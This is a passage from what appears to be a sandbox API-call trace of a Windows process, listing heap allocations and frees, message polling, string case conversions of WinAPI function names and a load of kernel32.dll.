(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0131.958] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0131.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0131.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0131.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0131.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0131.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0131.959] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0131.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0131.959] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0131.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0131.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0131.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0131.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0131.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0131.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0131.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0131.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0131.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0131.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0131.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0131.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925e0 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0131.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0131.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0131.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0131.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0131.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0131.962] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0131.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0131.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0131.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0131.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0131.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.964] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0131.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.967] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.967] WideCharToMultiByte (in: 